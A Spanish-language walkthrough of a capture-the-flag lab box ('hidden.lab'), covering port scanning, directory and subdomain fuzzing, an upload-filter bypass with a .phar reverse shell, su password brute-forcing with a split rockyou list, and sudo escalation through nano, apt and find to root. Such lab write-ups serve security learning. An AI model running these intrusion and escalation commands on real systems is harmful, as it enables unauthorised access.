# Enumeracion de Puertos, Servicios y Versiones

nmap -Pn -n -sS -p- -sV --script vuln --min-rate 5000 -vvv -oN nmap 172.17.0.2

80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.52


al chequear el servicio web no es posible la conexion pero la url cambia e indica: http://hidden.lab/
asi que lo agrego al archivo /etc/hosts

al volver a chequear, establece la conexion reviso la web y su codigo pero no consigo nada asi que ahora 
tocara hacer fuzzing web

# Fuzzing Web

gobuster dir -u http://hidden.lab/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,txt,html,py,js,png,jpg

===============================================================
/.html                (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 10483]
/contact.html         (Status: 200) [Size: 11680]
/about.html           (Status: 200) [Size: 9703]
/img                  (Status: 301) [Size: 306] [--> http://hidden.lab/img/]
/.php                 (Status: 403) [Size: 275]
/menu.html            (Status: 200) [Size: 11846]
/service.html         (Status: 200) [Size: 10926]
/css                  (Status: 301) [Size: 306] [--> http://hidden.lab/css/]
/lib                  (Status: 301) [Size: 306] [--> http://hidden.lab/lib/]
/mail                 (Status: 301) [Size: 307] [--> http://hidden.lab/mail/]
/js                   (Status: 301) [Size: 305] [--> http://hidden.lab/js/]
/testimonial.html     (Status: 200) [Size: 10335]
/reservation.html     (Status: 200) [Size: 11786]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1661144 / 1661152 (100.00%)
===============================================================

Despues de un buen rato chequeando y revisando los diferentes directorios no consegui nada, se me ocurre es buscar subdominios...

wfuzz -H "Host: FUZZ.hidden.lab" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://hidden.lab --hw 26

000000019:   200        57 L     130 W      1653 Ch     "dev"  


conseguimos un subdominio: http://dev.hidden.lab y lo agrego al archivo /etc/hosts
y al revisar nos conseguimos que nos solicita enviar nuestro CV en PDF
indica tambien que no se pueden subir archivos php...

hacemos funzzing

gobuster dir -u http://dev.hidden.lab/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,txt,html,py,js,png,jpg

===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1653]
/uploads              (Status: 301) [Size: 318] [--> http://dev.hidden.lab/uploads/]
/upload.php           (Status: 200) [Size: 74]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1661144 / 1661152 (100.00%)
===============================================================
ya puedo ver donde se encuentran los archivos que vamos a cargar: /uploads

en primera instancia me hago de un codigo php que me envie una reverse shell y le cambio la 
extension a php2, la intento subir y se carga, hago la prueba pero no es interpretado, asi que 
en hacktricks consegui una lista de extensiones que podrian funcionar, probe hasta conseguir la
extension que interpreta: phar asi que pude conseguir la reverse shell.

# Escalada

script /dev/null -c bash
stty raw -echo; fg
reset xterm
stty rows 38 columns 168
export TERM=xterm
export SHELL=bash

sudo -l					| no funciona
find / -perm -4000 2>/dev/null		| nada

reviso el sistema y los procesos pero sigo sin conseguir nada, al leer el archivo /etc/passwd
me consigo con 3 usuarios: bobby, john y cafetero.. se me ocurre aplicar fuerza bruta contra
los usuarios a ver si consigo la clave de alguno..

como no contamos con wget ni con curl, subo el script para el ataque por lo mismo web donde cargue
la reverse shell, intento pasar un diccionario pero no lo carga por ser pesado asi que lo divido

split -l 100000 -d /home/darks/Desktop/Kali/diccionarios/rockyou.txt parte_

dividimos el diccionario rockyuo en archivos mas pequenos, cada uno de 100.000 lineas

ahora cargo el primer archivo: parte_00 y pruebo a realizar el ataque

cd /var/www/dev.hidden.lab/uploads/
ls
Linux-Su-Force.sh  parte_00  shell.phar
chmod +x Linux-Su-Force.sh
./Linux-Su-Force.sh cafetero parte_00
Contraseña encontrada para el usuario cafetero: 123123

su cafetero
passwd: 123123
whoami
cafetero
sudo -l

    (john) NOPASSWD: /usr/bin/nano

sudo -u john /usr/bin/nano

 ^R^X
reset; bash 1>&0 2>&0
clear
whoami
john

ahora somo el usuario john

sudo -l

(bobby) NOPASSWD: /usr/bin/apt

sudo -u bobby /usr/bin/apt changelog apt
!/bin/bash
whoami
bobby

ahora somo bobby

sudo -l
    (root) NOPASSWD: /usr/bin/find

sudo /usr/bin/find . -exec /bin/bash \; -quit
whoami
#root


Nota: para abusar de los binarios usaba desde mi maquina atacante searchbins
mas rapido que ir a GTFOBINS

searchbins -b nano -f sudo
searchbins -b apt -f sudo
searchbins -b find -f sudo

repo de la herramienta
{https://github.com/r1vs3c/searchbins}
